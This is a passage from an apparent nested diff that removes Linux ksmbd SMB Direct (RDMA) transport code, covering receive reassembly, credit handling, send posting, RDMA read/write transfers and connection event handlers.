+-	wr.wr_cqe = &recvmsg->cqe;
+-	wr.next = NULL;
+-	wr.sg_list = &recvmsg->sge;
+-	wr.num_sge = 1;
+-
+-	ret = ib_post_recv(t->qp, &wr, NULL);
+-	if (ret) {
+-		pr_err("Can't post recv: %d\n", ret);
+-		ib_dma_unmap_single(t->cm_id->device,
+-				    recvmsg->sge.addr, recvmsg->sge.length,
+-				    DMA_FROM_DEVICE);
+-		smb_direct_disconnect_rdma_connection(t);
+-		return ret;
+-	}
+-	return ret;
+-}
+-
+-static int smb_direct_read(struct ksmbd_transport *t, char *buf,
+-			   unsigned int size, int unused)
+-{
+-	struct smb_direct_recvmsg *recvmsg;
+-	struct smb_direct_data_transfer *data_transfer;
+-	int to_copy, to_read, data_read, offset;
+-	u32 data_length, remaining_data_length, data_offset;
+-	int rc;
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-
+-again:
+-	if (st->status != SMB_DIRECT_CS_CONNECTED) {
+-		pr_err("disconnected\n");
+-		return -ENOTCONN;
+-	}
+-
+-	/*
+-	 * No need to hold the reassembly queue lock all the time as we are
+-	 * the only one reading from the front of the queue. The transport
+-	 * may add more entries to the back of the queue at the same time
+-	 */
+-	if (st->reassembly_data_length >= size) {
+-		int queue_length;
+-		int queue_removed = 0;
+-
+-		/*
+-		 * Need to make sure reassembly_data_length is read before
+-		 * reading reassembly_queue_length and calling
+-		 * get_first_reassembly. This call is lock free
+-		 * as we never read at the end of the queue which are being
+-		 * updated in SOFTIRQ as more data is received
+-		 */
+-		virt_rmb();
+-		queue_length = st->reassembly_queue_length;
+-		data_read = 0;
+-		to_read = size;
+-		offset = st->first_entry_offset;
+-		while (data_read < size) {
+-			recvmsg = get_first_reassembly(st);
+-			data_transfer = smb_direct_recvmsg_payload(recvmsg);
+-			data_length = le32_to_cpu(data_transfer->data_length);
+-			remaining_data_length =
+-				le32_to_cpu(data_transfer->remaining_data_length);
+-			data_offset = le32_to_cpu(data_transfer->data_offset);
+-
+-			/*
+-			 * The upper layer expects RFC1002 length at the
+-			 * beginning of the payload. Return it to indicate
+-			 * the total length of the packet. This minimize the
+-			 * change to upper layer packet processing logic. This
+-			 * will be eventually remove when an intermediate
+-			 * transport layer is added
+-			 */
+-			if (recvmsg->first_segment && size == 4) {
+-				unsigned int rfc1002_len =
+-					data_length + remaining_data_length;
+-				*((__be32 *)buf) = cpu_to_be32(rfc1002_len);
+-				data_read = 4;
+-				recvmsg->first_segment = false;
+-				ksmbd_debug(RDMA,
+-					    "returning rfc1002 length %d\n",
+-					    rfc1002_len);
+-				goto read_rfc1002_done;
+-			}
+-
+-			to_copy = min_t(int, data_length - offset, to_read);
+-			memcpy(buf + data_read, (char *)data_transfer + data_offset + offset,
+-			       to_copy);
+-
+-			/* move on to the next buffer? */
+-			if (to_copy == data_length - offset) {
+-				queue_length--;
+-				/*
+-				 * No need to lock if we are not at the
+-				 * end of the queue
+-				 */
+-				if (queue_length) {
+-					list_del(&recvmsg->list);
+-				} else {
+-					spin_lock_irq(&st->reassembly_queue_lock);
+-					list_del(&recvmsg->list);
+-					spin_unlock_irq(&st->reassembly_queue_lock);
+-				}
+-				queue_removed++;
+-				put_recvmsg(st, recvmsg);
+-				offset = 0;
+-			} else {
+-				offset += to_copy;
+-			}
+-
+-			to_read -= to_copy;
+-			data_read += to_copy;
+-		}
+-
+-		spin_lock_irq(&st->reassembly_queue_lock);
+-		st->reassembly_data_length -= data_read;
+-		st->reassembly_queue_length -= queue_removed;
+-		spin_unlock_irq(&st->reassembly_queue_lock);
+-
+-		spin_lock(&st->receive_credit_lock);
+-		st->count_avail_recvmsg += queue_removed;
+-		if (is_receive_credit_post_required(st->recv_credits, st->count_avail_recvmsg)) {
+-			spin_unlock(&st->receive_credit_lock);
+-			mod_delayed_work(smb_direct_wq,
+-					 &st->post_recv_credits_work, 0);
+-		} else {
+-			spin_unlock(&st->receive_credit_lock);
+-		}
+-
+-		st->first_entry_offset = offset;
+-		ksmbd_debug(RDMA,
+-			    "returning to thread data_read=%d reassembly_data_length=%d first_entry_offset=%d\n",
+-			    data_read, st->reassembly_data_length,
+-			    st->first_entry_offset);
+-read_rfc1002_done:
+-		return data_read;
+-	}
+-
+-	ksmbd_debug(RDMA, "wait_event on more data\n");
+-	rc = wait_event_interruptible(st->wait_reassembly_queue,
+-				      st->reassembly_data_length >= size ||
+-				       st->status != SMB_DIRECT_CS_CONNECTED);
+-	if (rc)
+-		return -EINTR;
+-
+-	goto again;
+-}
+-
+-static void smb_direct_post_recv_credits(struct work_struct *work)
+-{
+-	struct smb_direct_transport *t = container_of(work,
+-		struct smb_direct_transport, post_recv_credits_work.work);
+-	struct smb_direct_recvmsg *recvmsg;
+-	int receive_credits, credits = 0;
+-	int ret;
+-	int use_free = 1;
+-
+-	spin_lock(&t->receive_credit_lock);
+-	receive_credits = t->recv_credits;
+-	spin_unlock(&t->receive_credit_lock);
+-
+-	if (receive_credits < t->recv_credit_target) {
+-		while (true) {
+-			if (use_free)
+-				recvmsg = get_free_recvmsg(t);
+-			else
+-				recvmsg = get_empty_recvmsg(t);
+-			if (!recvmsg) {
+-				if (use_free) {
+-					use_free = 0;
+-					continue;
+-				} else {
+-					break;
+-				}
+-			}
+-
+-			recvmsg->type = SMB_DIRECT_MSG_DATA_TRANSFER;
+-			recvmsg->first_segment = false;
+-
+-			ret = smb_direct_post_recv(t, recvmsg);
+-			if (ret) {
+-				pr_err("Can't post recv: %d\n", ret);
+-				put_recvmsg(t, recvmsg);
+-				break;
+-			}
+-			credits++;
+-		}
+-	}
+-
+-	spin_lock(&t->receive_credit_lock);
+-	t->recv_credits += credits;
+-	t->count_avail_recvmsg -= credits;
+-	spin_unlock(&t->receive_credit_lock);
+-
+-	spin_lock(&t->lock_new_recv_credits);
+-	t->new_recv_credits += credits;
+-	spin_unlock(&t->lock_new_recv_credits);
+-
+-	if (credits)
+-		queue_work(smb_direct_wq, &t->send_immediate_work);
+-}
+-
+-static void send_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smb_direct_sendmsg *sendmsg, *sibling;
+-	struct smb_direct_transport *t;
+-	struct list_head *pos, *prev, *end;
+-
+-	sendmsg = container_of(wc->wr_cqe, struct smb_direct_sendmsg, cqe);
+-	t = sendmsg->transport;
+-
+-	ksmbd_debug(RDMA, "Send completed. status='%s (%d)', opcode=%d\n",
+-		    ib_wc_status_msg(wc->status), wc->status,
+-		    wc->opcode);
+-
+-	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_SEND) {
+-		pr_err("Send error. status='%s (%d)', opcode=%d\n",
+-		       ib_wc_status_msg(wc->status), wc->status,
+-		       wc->opcode);
+-		smb_direct_disconnect_rdma_connection(t);
+-	}
+-
+-	if (atomic_dec_and_test(&t->send_pending))
+-		wake_up(&t->wait_send_pending);
+-
+-	/* iterate and free the list of messages in reverse. the list's head
+-	 * is invalid.
+-	 */
+-	for (pos = &sendmsg->list, prev = pos->prev, end = sendmsg->list.next;
+-	     prev != end; pos = prev, prev = prev->prev) {
+-		sibling = container_of(pos, struct smb_direct_sendmsg, list);
+-		smb_direct_free_sendmsg(t, sibling);
+-	}
+-
+-	sibling = container_of(pos, struct smb_direct_sendmsg, list);
+-	smb_direct_free_sendmsg(t, sibling);
+-}
+-
+-static int manage_credits_prior_sending(struct smb_direct_transport *t)
+-{
+-	int new_credits;
+-
+-	spin_lock(&t->lock_new_recv_credits);
+-	new_credits = t->new_recv_credits;
+-	t->new_recv_credits = 0;
+-	spin_unlock(&t->lock_new_recv_credits);
+-
+-	return new_credits;
+-}
+-
+-static int smb_direct_post_send(struct smb_direct_transport *t,
+-				struct ib_send_wr *wr)
+-{
+-	int ret;
+-
+-	atomic_inc(&t->send_pending);
+-	ret = ib_post_send(t->qp, wr, NULL);
+-	if (ret) {
+-		pr_err("failed to post send: %d\n", ret);
+-		if (atomic_dec_and_test(&t->send_pending))
+-			wake_up(&t->wait_send_pending);
+-		smb_direct_disconnect_rdma_connection(t);
+-	}
+-	return ret;
+-}
+-
+-static void smb_direct_send_ctx_init(struct smb_direct_transport *t,
+-				     struct smb_direct_send_ctx *send_ctx,
+-				     bool need_invalidate_rkey,
+-				     unsigned int remote_key)
+-{
+-	INIT_LIST_HEAD(&send_ctx->msg_list);
+-	send_ctx->wr_cnt = 0;
+-	send_ctx->need_invalidate_rkey = need_invalidate_rkey;
+-	send_ctx->remote_key = remote_key;
+-}
+-
+-static int smb_direct_flush_send_list(struct smb_direct_transport *t,
+-				      struct smb_direct_send_ctx *send_ctx,
+-				      bool is_last)
+-{
+-	struct smb_direct_sendmsg *first, *last;
+-	int ret;
+-
+-	if (list_empty(&send_ctx->msg_list))
+-		return 0;
+-
+-	first = list_first_entry(&send_ctx->msg_list,
+-				 struct smb_direct_sendmsg,
+-				 list);
+-	last = list_last_entry(&send_ctx->msg_list,
+-			       struct smb_direct_sendmsg,
+-			       list);
+-
+-	last->wr.send_flags = IB_SEND_SIGNALED;
+-	last->wr.wr_cqe = &last->cqe;
+-	if (is_last && send_ctx->need_invalidate_rkey) {
+-		last->wr.opcode = IB_WR_SEND_WITH_INV;
+-		last->wr.ex.invalidate_rkey = send_ctx->remote_key;
+-	}
+-
+-	ret = smb_direct_post_send(t, &first->wr);
+-	if (!ret) {
+-		smb_direct_send_ctx_init(t, send_ctx,
+-					 send_ctx->need_invalidate_rkey,
+-					 send_ctx->remote_key);
+-	} else {
+-		atomic_add(send_ctx->wr_cnt, &t->send_credits);
+-		wake_up(&t->wait_send_credits);
+-		list_for_each_entry_safe(first, last, &send_ctx->msg_list,
+-					 list) {
+-			smb_direct_free_sendmsg(t, first);
+-		}
+-	}
+-	return ret;
+-}
+-
+-static int wait_for_credits(struct smb_direct_transport *t,
+-			    wait_queue_head_t *waitq, atomic_t *total_credits,
+-			    int needed)
+-{
+-	int ret;
+-
+-	do {
+-		if (atomic_sub_return(needed, total_credits) >= 0)
+-			return 0;
+-
+-		atomic_add(needed, total_credits);
+-		ret = wait_event_interruptible(*waitq,
+-					       atomic_read(total_credits) >= needed ||
+-					       t->status != SMB_DIRECT_CS_CONNECTED);
+-
+-		if (t->status != SMB_DIRECT_CS_CONNECTED)
+-			return -ENOTCONN;
+-		else if (ret < 0)
+-			return ret;
+-	} while (true);
+-}
+-
+-static int wait_for_send_credits(struct smb_direct_transport *t,
+-				 struct smb_direct_send_ctx *send_ctx)
+-{
+-	int ret;
+-
+-	if (send_ctx &&
+-	    (send_ctx->wr_cnt >= 16 || atomic_read(&t->send_credits) <= 1)) {
+-		ret = smb_direct_flush_send_list(t, send_ctx, false);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return wait_for_credits(t, &t->wait_send_credits, &t->send_credits, 1);
+-}
+-
+-static int wait_for_rw_credits(struct smb_direct_transport *t, int credits)
+-{
+-	return wait_for_credits(t, &t->wait_rw_credits, &t->rw_credits, credits);
+-}
+-
+-static int calc_rw_credits(struct smb_direct_transport *t,
+-			   char *buf, unsigned int len)
+-{
+-	return DIV_ROUND_UP(get_buf_page_count(buf, len),
+-			    t->pages_per_rw_credit);
+-}
+-
+-static int smb_direct_create_header(struct smb_direct_transport *t,
+-				    int size, int remaining_data_length,
+-				    struct smb_direct_sendmsg **sendmsg_out)
+-{
+-	struct smb_direct_sendmsg *sendmsg;
+-	struct smb_direct_data_transfer *packet;
+-	int header_length;
+-	int ret;
+-
+-	sendmsg = smb_direct_alloc_sendmsg(t);
+-	if (IS_ERR(sendmsg))
+-		return PTR_ERR(sendmsg);
+-
+-	/* Fill in the packet header */
+-	packet = (struct smb_direct_data_transfer *)sendmsg->packet;
+-	packet->credits_requested = cpu_to_le16(t->send_credit_target);
+-	packet->credits_granted = cpu_to_le16(manage_credits_prior_sending(t));
+-
+-	packet->flags = 0;
+-	packet->reserved = 0;
+-	if (!size)
+-		packet->data_offset = 0;
+-	else
+-		packet->data_offset = cpu_to_le32(24);
+-	packet->data_length = cpu_to_le32(size);
+-	packet->remaining_data_length = cpu_to_le32(remaining_data_length);
+-	packet->padding = 0;
+-
+-	ksmbd_debug(RDMA,
+-		    "credits_requested=%d credits_granted=%d data_offset=%d data_length=%d remaining_data_length=%d\n",
+-		    le16_to_cpu(packet->credits_requested),
+-		    le16_to_cpu(packet->credits_granted),
+-		    le32_to_cpu(packet->data_offset),
+-		    le32_to_cpu(packet->data_length),
+-		    le32_to_cpu(packet->remaining_data_length));
+-
+-	/* Map the packet to DMA */
+-	header_length = sizeof(struct smb_direct_data_transfer);
+-	/* If this is a packet without payload, don't send padding */
+-	if (!size)
+-		header_length =
+-			offsetof(struct smb_direct_data_transfer, padding);
+-
+-	sendmsg->sge[0].addr = ib_dma_map_single(t->cm_id->device,
+-						 (void *)packet,
+-						 header_length,
+-						 DMA_TO_DEVICE);
+-	ret = ib_dma_mapping_error(t->cm_id->device, sendmsg->sge[0].addr);
+-	if (ret) {
+-		smb_direct_free_sendmsg(t, sendmsg);
+-		return ret;
+-	}
+-
+-	sendmsg->num_sge = 1;
+-	sendmsg->sge[0].length = header_length;
+-	sendmsg->sge[0].lkey = t->pd->local_dma_lkey;
+-
+-	*sendmsg_out = sendmsg;
+-	return 0;
+-}
+-
+-static int get_sg_list(void *buf, int size, struct scatterlist *sg_list, int nentries)
+-{
+-	bool high = is_vmalloc_addr(buf);
+-	struct page *page;
+-	int offset, len;
+-	int i = 0;
+-
+-	if (size <= 0 || nentries < get_buf_page_count(buf, size))
+-		return -EINVAL;
+-
+-	offset = offset_in_page(buf);
+-	buf -= offset;
+-	while (size > 0) {
+-		len = min_t(int, PAGE_SIZE - offset, size);
+-		if (high)
+-			page = vmalloc_to_page(buf);
+-		else
+-			page = kmap_to_page(buf);
+-
+-		if (!sg_list)
+-			return -EINVAL;
+-		sg_set_page(sg_list, page, len, offset);
+-		sg_list = sg_next(sg_list);
+-
+-		buf += PAGE_SIZE;
+-		size -= len;
+-		offset = 0;
+-		i++;
+-	}
+-	return i;
+-}
+-
+-static int get_mapped_sg_list(struct ib_device *device, void *buf, int size,
+-			      struct scatterlist *sg_list, int nentries,
+-			      enum dma_data_direction dir)
+-{
+-	int npages;
+-
+-	npages = get_sg_list(buf, size, sg_list, nentries);
+-	if (npages < 0)
+-		return -EINVAL;
+-	return ib_dma_map_sg(device, sg_list, npages, dir);
+-}
+-
+-static int post_sendmsg(struct smb_direct_transport *t,
+-			struct smb_direct_send_ctx *send_ctx,
+-			struct smb_direct_sendmsg *msg)
+-{
+-	int i;
+-
+-	for (i = 0; i < msg->num_sge; i++)
+-		ib_dma_sync_single_for_device(t->cm_id->device,
+-					      msg->sge[i].addr, msg->sge[i].length,
+-					      DMA_TO_DEVICE);
+-
+-	msg->cqe.done = send_done;
+-	msg->wr.opcode = IB_WR_SEND;
+-	msg->wr.sg_list = &msg->sge[0];
+-	msg->wr.num_sge = msg->num_sge;
+-	msg->wr.next = NULL;
+-
+-	if (send_ctx) {
+-		msg->wr.wr_cqe = NULL;
+-		msg->wr.send_flags = 0;
+-		if (!list_empty(&send_ctx->msg_list)) {
+-			struct smb_direct_sendmsg *last;
+-
+-			last = list_last_entry(&send_ctx->msg_list,
+-					       struct smb_direct_sendmsg,
+-					       list);
+-			last->wr.next = &msg->wr;
+-		}
+-		list_add_tail(&msg->list, &send_ctx->msg_list);
+-		send_ctx->wr_cnt++;
+-		return 0;
+-	}
+-
+-	msg->wr.wr_cqe = &msg->cqe;
+-	msg->wr.send_flags = IB_SEND_SIGNALED;
+-	return smb_direct_post_send(t, &msg->wr);
+-}
+-
+-static int smb_direct_post_send_data(struct smb_direct_transport *t,
+-				     struct smb_direct_send_ctx *send_ctx,
+-				     struct kvec *iov, int niov,
+-				     int remaining_data_length)
+-{
+-	int i, j, ret;
+-	struct smb_direct_sendmsg *msg;
+-	int data_length;
+-	struct scatterlist sg[SMB_DIRECT_MAX_SEND_SGES - 1];
+-
+-	ret = wait_for_send_credits(t, send_ctx);
+-	if (ret)
+-		return ret;
+-
+-	data_length = 0;
+-	for (i = 0; i < niov; i++)
+-		data_length += iov[i].iov_len;
+-
+-	ret = smb_direct_create_header(t, data_length, remaining_data_length,
+-				       &msg);
+-	if (ret) {
+-		atomic_inc(&t->send_credits);
+-		return ret;
+-	}
+-
+-	for (i = 0; i < niov; i++) {
+-		struct ib_sge *sge;
+-		int sg_cnt;
+-
+-		sg_init_table(sg, SMB_DIRECT_MAX_SEND_SGES - 1);
+-		sg_cnt = get_mapped_sg_list(t->cm_id->device,
+-					    iov[i].iov_base, iov[i].iov_len,
+-					    sg, SMB_DIRECT_MAX_SEND_SGES - 1,
+-					    DMA_TO_DEVICE);
+-		if (sg_cnt <= 0) {
+-			pr_err("failed to map buffer\n");
+-			ret = -ENOMEM;
+-			goto err;
+-		} else if (sg_cnt + msg->num_sge > SMB_DIRECT_MAX_SEND_SGES) {
+-			pr_err("buffer not fitted into sges\n");
+-			ret = -E2BIG;
+-			ib_dma_unmap_sg(t->cm_id->device, sg, sg_cnt,
+-					DMA_TO_DEVICE);
+-			goto err;
+-		}
+-
+-		for (j = 0; j < sg_cnt; j++) {
+-			sge = &msg->sge[msg->num_sge];
+-			sge->addr = sg_dma_address(&sg[j]);
+-			sge->length = sg_dma_len(&sg[j]);
+-			sge->lkey  = t->pd->local_dma_lkey;
+-			msg->num_sge++;
+-		}
+-	}
+-
+-	ret = post_sendmsg(t, send_ctx, msg);
+-	if (ret)
+-		goto err;
+-	return 0;
+-err:
+-	smb_direct_free_sendmsg(t, msg);
+-	atomic_inc(&t->send_credits);
+-	return ret;
+-}
+-
+-static int smb_direct_writev(struct ksmbd_transport *t,
+-			     struct kvec *iov, int niovs, int buflen,
+-			     bool need_invalidate, unsigned int remote_key)
+-{
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-	int remaining_data_length;
+-	int start, i, j;
+-	int max_iov_size = st->max_send_size -
+-			sizeof(struct smb_direct_data_transfer);
+-	int ret;
+-	struct kvec vec;
+-	struct smb_direct_send_ctx send_ctx;
+-
+-	if (st->status != SMB_DIRECT_CS_CONNECTED)
+-		return -ENOTCONN;
+-
+-	//FIXME: skip RFC1002 header..
+-	buflen -= 4;
+-	iov[0].iov_base += 4;
+-	iov[0].iov_len -= 4;
+-
+-	remaining_data_length = buflen;
+-	ksmbd_debug(RDMA, "Sending smb (RDMA): smb_len=%u\n", buflen);
+-
+-	smb_direct_send_ctx_init(st, &send_ctx, need_invalidate, remote_key);
+-	start = i = 0;
+-	buflen = 0;
+-	while (true) {
+-		buflen += iov[i].iov_len;
+-		if (buflen > max_iov_size) {
+-			if (i > start) {
+-				remaining_data_length -=
+-					(buflen - iov[i].iov_len);
+-				ret = smb_direct_post_send_data(st, &send_ctx,
+-								&iov[start], i - start,
+-								remaining_data_length);
+-				if (ret)
+-					goto done;
+-			} else {
+-				/* iov[start] is too big, break it */
+-				int nvec  = (buflen + max_iov_size - 1) /
+-						max_iov_size;
+-
+-				for (j = 0; j < nvec; j++) {
+-					vec.iov_base =
+-						(char *)iov[start].iov_base +
+-						j * max_iov_size;
+-					vec.iov_len =
+-						min_t(int, max_iov_size,
+-						      buflen - max_iov_size * j);
+-					remaining_data_length -= vec.iov_len;
+-					ret = smb_direct_post_send_data(st, &send_ctx, &vec, 1,
+-									remaining_data_length);
+-					if (ret)
+-						goto done;
+-				}
+-				i++;
+-				if (i == niovs)
+-					break;
+-			}
+-			start = i;
+-			buflen = 0;
+-		} else {
+-			i++;
+-			if (i == niovs) {
+-				/* send out all remaining vecs */
+-				remaining_data_length -= buflen;
+-				ret = smb_direct_post_send_data(st, &send_ctx,
+-								&iov[start], i - start,
+-								remaining_data_length);
+-				if (ret)
+-					goto done;
+-				break;
+-			}
+-		}
+-	}
+-
+-done:
+-	ret = smb_direct_flush_send_list(st, &send_ctx, true);
+-
+-	/*
+-	 * As an optimization, we don't wait for individual I/O to finish
+-	 * before sending the next one.
+-	 * Send them all and wait for pending send count to get to 0
+-	 * that means all the I/Os have been out and we are good to return
+-	 */
+-
+-	wait_event(st->wait_send_pending,
+-		   atomic_read(&st->send_pending) == 0);
+-	return ret;
+-}
+-
+-static void smb_direct_free_rdma_rw_msg(struct smb_direct_transport *t,
+-					struct smb_direct_rdma_rw_msg *msg,
+-					enum dma_data_direction dir)
+-{
+-	rdma_rw_ctx_destroy(&msg->rw_ctx, t->qp, t->qp->port,
+-			    msg->sgt.sgl, msg->sgt.nents, dir);
+-	sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
+-	kfree(msg);
+-}
+-
+-static void read_write_done(struct ib_cq *cq, struct ib_wc *wc,
+-			    enum dma_data_direction dir)
+-{
+-	struct smb_direct_rdma_rw_msg *msg = container_of(wc->wr_cqe,
+-							  struct smb_direct_rdma_rw_msg, cqe);
+-	struct smb_direct_transport *t = msg->t;
+-
+-	if (wc->status != IB_WC_SUCCESS) {
+-		msg->status = -EIO;
+-		pr_err("read/write error. opcode = %d, status = %s(%d)\n",
+-		       wc->opcode, ib_wc_status_msg(wc->status), wc->status);
+-		if (wc->status != IB_WC_WR_FLUSH_ERR)
+-			smb_direct_disconnect_rdma_connection(t);
+-	}
+-
+-	complete(msg->completion);
+-}
+-
+-static void read_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	read_write_done(cq, wc, DMA_FROM_DEVICE);
+-}
+-
+-static void write_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	read_write_done(cq, wc, DMA_TO_DEVICE);
+-}
+-
+-static int smb_direct_rdma_xmit(struct smb_direct_transport *t,
+-				void *buf, int buf_len,
+-				struct smb2_buffer_desc_v1 *desc,
+-				unsigned int desc_len,
+-				bool is_read)
+-{
+-	struct smb_direct_rdma_rw_msg *msg, *next_msg;
+-	int i, ret;
+-	DECLARE_COMPLETION_ONSTACK(completion);
+-	struct ib_send_wr *first_wr;
+-	LIST_HEAD(msg_list);
+-	char *desc_buf;
+-	int credits_needed;
+-	unsigned int desc_buf_len;
+-	size_t total_length = 0;
+-
+-	if (t->status != SMB_DIRECT_CS_CONNECTED)
+-		return -ENOTCONN;
+-
+-	/* calculate needed credits */
+-	credits_needed = 0;
+-	desc_buf = buf;
+-	for (i = 0; i < desc_len / sizeof(*desc); i++) {
+-		desc_buf_len = le32_to_cpu(desc[i].length);
+-
+-		credits_needed += calc_rw_credits(t, desc_buf, desc_buf_len);
+-		desc_buf += desc_buf_len;
+-		total_length += desc_buf_len;
+-		if (desc_buf_len == 0 || total_length > buf_len ||
+-		    total_length > t->max_rdma_rw_size)
+-			return -EINVAL;
+-	}
+-
+-	ksmbd_debug(RDMA, "RDMA %s, len %#x, needed credits %#x\n",
+-		    is_read ? "read" : "write", buf_len, credits_needed);
+-
+-	ret = wait_for_rw_credits(t, credits_needed);
+-	if (ret < 0)
+-		return ret;
+-
+-	/* build rdma_rw_ctx for each descriptor */
+-	desc_buf = buf;
+-	for (i = 0; i < desc_len / sizeof(*desc); i++) {
+-		msg = kzalloc(offsetof(struct smb_direct_rdma_rw_msg, sg_list) +
+-			      sizeof(struct scatterlist) * SG_CHUNK_SIZE, GFP_KERNEL);
+-		if (!msg) {
+-			ret = -ENOMEM;
+-			goto out;
+-		}
+-
+-		desc_buf_len = le32_to_cpu(desc[i].length);
+-
+-		msg->t = t;
+-		msg->cqe.done = is_read ? read_done : write_done;
+-		msg->completion = &completion;
+-
+-		msg->sgt.sgl = &msg->sg_list[0];
+-		ret = sg_alloc_table_chained(&msg->sgt,
+-					     get_buf_page_count(desc_buf, desc_buf_len),
+-					     msg->sg_list, SG_CHUNK_SIZE);
+-		if (ret) {
+-			kfree(msg);
+-			ret = -ENOMEM;
+-			goto out;
+-		}
+-
+-		ret = get_sg_list(desc_buf, desc_buf_len,
+-				  msg->sgt.sgl, msg->sgt.orig_nents);
+-		if (ret < 0) {
+-			sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
+-			kfree(msg);
+-			goto out;
+-		}
+-
+-		ret = rdma_rw_ctx_init(&msg->rw_ctx, t->qp, t->qp->port,
+-				       msg->sgt.sgl,
+-				       get_buf_page_count(desc_buf, desc_buf_len),
+-				       0,
+-				       le64_to_cpu(desc[i].offset),
+-				       le32_to_cpu(desc[i].token),
+-				       is_read ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
+-		if (ret < 0) {
+-			pr_err("failed to init rdma_rw_ctx: %d\n", ret);
+-			sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
+-			kfree(msg);
+-			goto out;
+-		}
+-
+-		list_add_tail(&msg->list, &msg_list);
+-		desc_buf += desc_buf_len;
+-	}
+-
+-	/* concatenate work requests of rdma_rw_ctxs */
+-	first_wr = NULL;
+-	list_for_each_entry_reverse(msg, &msg_list, list) {
+-		first_wr = rdma_rw_ctx_wrs(&msg->rw_ctx, t->qp, t->qp->port,
+-					   &msg->cqe, first_wr);
+-	}
+-
+-	ret = ib_post_send(t->qp, first_wr, NULL);
+-	if (ret) {
+-		pr_err("failed to post send wr for RDMA R/W: %d\n", ret);
+-		goto out;
+-	}
+-
+-	msg = list_last_entry(&msg_list, struct smb_direct_rdma_rw_msg, list);
+-	wait_for_completion(&completion);
+-	ret = msg->status;
+-out:
+-	list_for_each_entry_safe(msg, next_msg, &msg_list, list) {
+-		list_del(&msg->list);
+-		smb_direct_free_rdma_rw_msg(t, msg,
+-					    is_read ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
+-	}
+-	atomic_add(credits_needed, &t->rw_credits);
+-	wake_up(&t->wait_rw_credits);
+-	return ret;
+-}
+-
+-static int smb_direct_rdma_write(struct ksmbd_transport *t,
+-				 void *buf, unsigned int buflen,
+-				 struct smb2_buffer_desc_v1 *desc,
+-				 unsigned int desc_len)
+-{
+-	return smb_direct_rdma_xmit(smb_trans_direct_transfort(t), buf, buflen,
+-				    desc, desc_len, false);
+-}
+-
+-static int smb_direct_rdma_read(struct ksmbd_transport *t,
+-				void *buf, unsigned int buflen,
+-				struct smb2_buffer_desc_v1 *desc,
+-				unsigned int desc_len)
+-{
+-	return smb_direct_rdma_xmit(smb_trans_direct_transfort(t), buf, buflen,
+-				    desc, desc_len, true);
+-}
+-
+-static void smb_direct_disconnect(struct ksmbd_transport *t)
+-{
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-
+-	ksmbd_debug(RDMA, "Disconnecting cm_id=%p\n", st->cm_id);
+-
+-	smb_direct_disconnect_rdma_work(&st->disconnect_work);
+-	wait_event_interruptible(st->wait_status,
+-				 st->status == SMB_DIRECT_CS_DISCONNECTED);
+-	free_transport(st);
+-}
+-
+-static void smb_direct_shutdown(struct ksmbd_transport *t)
+-{
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-
+-	ksmbd_debug(RDMA, "smb-direct shutdown cm_id=%p\n", st->cm_id);
+-
+-	smb_direct_disconnect_rdma_work(&st->disconnect_work);
+-}
+-
+-static int smb_direct_cm_handler(struct rdma_cm_id *cm_id,
+-				 struct rdma_cm_event *event)
+-{
+-	struct smb_direct_transport *t = cm_id->context;
+-
+-	ksmbd_debug(RDMA, "RDMA CM event. cm_id=%p event=%s (%d)\n",
+-		    cm_id, rdma_event_msg(event->event), event->event);
+-
+-	switch (event->event) {
+-	case RDMA_CM_EVENT_ESTABLISHED: {
+-		t->status = SMB_DIRECT_CS_CONNECTED;
+-		wake_up_interruptible(&t->wait_status);
+-		break;
+-	}
+-	case RDMA_CM_EVENT_DEVICE_REMOVAL:
+-	case RDMA_CM_EVENT_DISCONNECTED: {
+-		ib_drain_qp(t->qp);
+-
+-		t->status = SMB_DIRECT_CS_DISCONNECTED;
+-		wake_up_interruptible(&t->wait_status);
+-		wake_up_interruptible(&t->wait_reassembly_queue);
+-		wake_up(&t->wait_send_credits);
+-		break;
+-	}
+-	case RDMA_CM_EVENT_CONNECT_ERROR: {
+-		t->status = SMB_DIRECT_CS_DISCONNECTED;
+-		wake_up_interruptible(&t->wait_status);
+-		break;
+-	}
+-	default:
+-		pr_err("Unexpected RDMA CM event. cm_id=%p, event=%s (%d)\n",
+-		       cm_id, rdma_event_msg(event->event),
+-		       event->event);
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static void smb_direct_qpair_handler(struct ib_event *event, void *context)
+-{
+-	struct smb_direct_transport *t = context;
+-
+-	ksmbd_debug(RDMA, "Received QP event. cm_id=%p, event=%s (%d)\n",
+-		    t->cm_id, ib_event_msg(event->event), event->event);
+-
+-	switch (event->event) {
+-	case IB_EVENT_CQ_ERR:
+-	case IB_EVENT_QP_FATAL:
+-		smb_direct_disconnect_rdma_connection(t);
+-		break;
+-	default:
+-		break;
+-	}
+-}
+-
+-static int smb_direct_send_negotiate_response(struct smb_direct_transport *t,
+-					      int failed)
+-{
+-	struct smb_direct_sendmsg *sendmsg;
+-	struct smb_direct_negotiate_resp *resp;
+-	int ret;
+-
+-	sendmsg = smb_direct_alloc_sendmsg(t);
+-	if (IS_ERR(sendmsg))
+-		return -ENOMEM;
+-
+-	resp = (struct smb_direct_negotiate_resp *)sendmsg->packet;
+-	if (failed) {
+-		memset(resp, 0, sizeof(*resp));
+-		resp->min_version = cpu_to_le16(0x0100);
+-		resp->max_version = cpu_to_le16(0x0100);
+-		resp->status = STATUS_NOT_SUPPORTED;
+-	} else {
+-		resp->status = STATUS_SUCCESS;
+-		resp->min_version = SMB_DIRECT_VERSION_LE;
+-		resp->max_version = SMB_DIRECT_VERSION_LE;
+-		resp->negotiated_version = SMB_DIRECT_VERSION_LE;
+-		resp->reserved = 0;
+-		resp->credits_requested =
+-				cpu_to_le16(t->send_credit_target);
+-		resp->credits_granted = cpu_to_le16(manage_credits_prior_sending(t));
